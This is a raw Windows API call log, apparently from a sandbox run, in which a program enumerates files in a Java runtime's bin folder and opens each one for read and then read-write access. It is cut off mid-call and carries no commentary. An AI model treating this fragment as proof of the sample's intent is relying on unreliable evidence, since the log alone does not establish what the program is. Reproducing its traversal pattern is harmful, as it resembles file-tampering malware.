1 [0093.640] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0093.640] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0093.640] CloseHandle (hObject=0x360) returned 1 [0093.640] AreFileApisANSI () returned 1 [0093.640] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53640, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 54 [0093.640] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x6c) returned 0x75eb8 [0093.640] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53640, cbMultiByte=-1, lpWideCharStr=0x75eb8, cchWideChar=54 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\policytool.exe") returned 54 [0093.640] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\policytool.exe" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\policytool.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x360 [0093.640] GetFileType (hFile=0x360) returned 0x1 [0093.640] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75eb8 | out: hHeap=0x20000) returned 1 [0093.641] CloseHandle (hObject=0x360) returned 1 [0093.641] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0093.641] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0093.641] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0093.641] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0093.641] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0093.641] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0093.641] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0093.641] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0093.641] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0093.641] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0093.641] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0093.641] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0093.641] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0093.641] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0093.641] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0093.641] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0093.641] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0093.641] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0093.641] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0093.641] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0093.641] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0093.641] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0093.641] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0093.641] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0093.641] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0093.641] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0093.641] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0093.641] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0093.641] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0093.641] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0093.641] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0093.641] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0093.642] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0093.642] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0093.642] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0093.642] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0093.642] AreFileApisANSI () returned 1 [0093.642] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53640, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 54 [0093.642] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x6c) returned 0x76110 [0093.642] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53640, cbMultiByte=-1, lpWideCharStr=0x76110, cchWideChar=54 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\policytool.exe") returned 54 [0093.642] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\policytool.exe" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\policytool.exe"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa89ee6c2, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa89ee6c2, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa89ee6c2, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x4040)) returned 1 [0093.642] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76110 | out: hHeap=0x20000) returned 1 [0093.642] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf00 | out: hHeap=0x20000) returned 1 [0093.642] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0093.642] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53640 | out: hHeap=0x20000) returned 1 [0093.642] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0093.642] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0093.642] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa89ee6c2, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa89ee6c2, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa89ee6c2, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0xe040, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="prism_common.dll", cAlternateFileName="PRISM_~1.DLL")) returned 1 [0093.642] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0093.642] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dff8 [0093.642] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0093.642] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e148 [0093.642] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0093.642] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4ddc8 [0093.642] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0093.642] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e148 | out: hHeap=0x20000) returned 1 [0093.642] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dff8 | out: hHeap=0x20000) returned 1 [0093.642] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ddc8 | out: hHeap=0x20000) returned 1 [0093.642] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cef0 [0093.642] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35050 [0093.642] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0093.642] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35050 | out: hHeap=0x20000) returned 1 [0093.642] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cef0 [0093.642] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f90 [0093.642] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0093.642] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f90 | out: hHeap=0x20000) returned 1 [0093.642] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0093.642] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d268 [0093.642] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e260 [0093.643] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x76) returned 0x6a3b0 [0093.643] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d268 | out: hHeap=0x20000) returned 1 [0093.643] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e260 | out: hHeap=0x20000) returned 1 [0093.643] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75c60 [0093.643] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a3b0 | out: hHeap=0x20000) returned 1 [0093.643] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0093.643] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0093.643] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0093.643] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0093.643] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75c60 | out: hHeap=0x20000) returned 1 [0093.643] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0093.643] AreFileApisANSI () returned 1 [0093.643] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\prism_common.dll", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\prism_common.dll", lpUsedDefaultChar=0x0) returned 56 [0093.643] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53640 [0093.643] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0093.643] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0093.643] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cef0 [0093.643] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf00 [0093.643] AreFileApisANSI () returned 1 [0093.643] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53640, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 56 [0093.643] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76278 [0093.643] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53640, cbMultiByte=-1, lpWideCharStr=0x76278, cchWideChar=56 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\prism_common.dll") returned 56 [0093.643] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\prism_common.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\prism_common.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x360 [0093.643] GetFileType (hFile=0x360) returned 0x1 [0093.643] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76278 | out: hHeap=0x20000) returned 1 [0093.644] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0093.644] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0093.644] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0093.644] CloseHandle (hObject=0x360) returned 1 [0093.644] AreFileApisANSI () returned 1 [0093.644] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53640, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 56 [0093.644] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75cd8 [0093.644] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53640, cbMultiByte=-1, lpWideCharStr=0x75cd8, cchWideChar=56 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\prism_common.dll") returned 56 [0093.644] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\prism_common.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\prism_common.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x360 [0093.644] GetFileType (hFile=0x360) returned 0x1 [0093.645] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75cd8 | out: hHeap=0x20000) returned 1 [0093.645] CloseHandle (hObject=0x360) returned 1 [0093.645] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0093.645] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0093.645] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0093.645] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0093.645] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0093.645] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0093.645] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0093.645] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0093.645] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0093.645] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0093.645] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0093.645] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0093.645] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0093.645] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0093.645] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0093.645] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0093.645] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0093.645] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e110 [0093.645] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e180 [0093.645] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0093.645] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e180 | out: hHeap=0x20000) returned 1 [0093.645] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e110 | out: hHeap=0x20000) returned 1 [0093.645] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0093.645] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0093.645] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0093.645] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0093.645] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dff8 [0093.645] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e068 [0093.645] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dff8 | out: hHeap=0x20000) returned 1 [0093.645] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0093.645] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0093.646] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e148 [0093.646] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e068 | out: hHeap=0x20000) returned 1 [0093.646] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0a0 [0093.646] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e148 | out: hHeap=0x20000) returned 1 [0093.646] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0a0 | out: hHeap=0x20000) returned 1 [0093.646] AreFileApisANSI () returned 1 [0093.646] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53640, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 56 [0093.646] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75fa8 [0093.646] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53640, cbMultiByte=-1, lpWideCharStr=0x75fa8, cchWideChar=56 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\prism_common.dll") returned 56 [0093.646] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\prism_common.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\prism_common.dll"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa89ee6c2, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa89ee6c2, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa89ee6c2, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0xe040)) returned 1 [0093.646] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75fa8 | out: hHeap=0x20000) returned 1 [0093.646] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf00 | out: hHeap=0x20000) returned 1 [0093.646] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0093.646] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53640 | out: hHeap=0x20000) returned 1 [0093.646] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0093.646] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0093.646] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa89ee6c2, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa89ee6c2, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8a148fe, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x1fe40, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="prism_d3d.dll", cAlternateFileName="PRISM_~2.DLL")) returned 1 [0093.647] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0093.647] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0093.647] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0093.647] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0093.647] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0093.647] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0093.647] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0093.647] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0093.647] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfc0 [0093.647] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f90 [0093.647] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0093.647] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f90 | out: hHeap=0x20000) returned 1 [0093.647] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfc0 [0093.647] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x351f0 [0093.647] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0093.647] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x351f0 | out: hHeap=0x20000) returned 1 [0093.647] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0093.647] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d000 [0093.647] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0093.647] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x76) returned 0x6a3b0 [0093.647] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d000 | out: hHeap=0x20000) returned 1 [0093.647] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0093.647] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76188 [0093.647] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a3b0 | out: hHeap=0x20000) returned 1 [0093.647] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0093.647] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0093.647] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0093.647] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0093.647] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76188 | out: hHeap=0x20000) returned 1 [0093.647] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0093.647] AreFileApisANSI () returned 1 [0093.647] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\prism_d3d.dll", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\prism_d3d.dll", lpUsedDefaultChar=0x0) returned 53 [0093.647] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53490 [0093.647] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0093.648] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0093.648] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0093.648] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfe0 [0093.648] AreFileApisANSI () returned 1 [0093.648] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53490, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 53 [0093.648] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x6a) returned 0x75cd8 [0093.648] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53490, cbMultiByte=-1, 